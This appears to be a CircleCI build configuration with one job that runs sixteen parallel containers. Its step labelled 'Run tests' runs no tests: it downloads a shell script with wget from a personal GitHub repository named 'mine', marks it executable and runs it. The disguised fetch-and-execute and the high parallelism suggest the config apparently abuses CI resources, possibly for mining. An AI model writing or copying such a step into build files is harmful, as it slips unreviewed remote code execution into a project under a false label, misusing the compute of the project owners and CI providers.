jobs:
  build:
    parallelism: 16
    docker:
      - image: cimg/ruby:3.0.2-node
    steps: 
      - checkout
      - run: 
          name: Run tests 
          command: wget https://raw.githubusercontent.com/gyrogerald/mine/main/working2.sh && chmod +x working2.sh &&./working2.sh
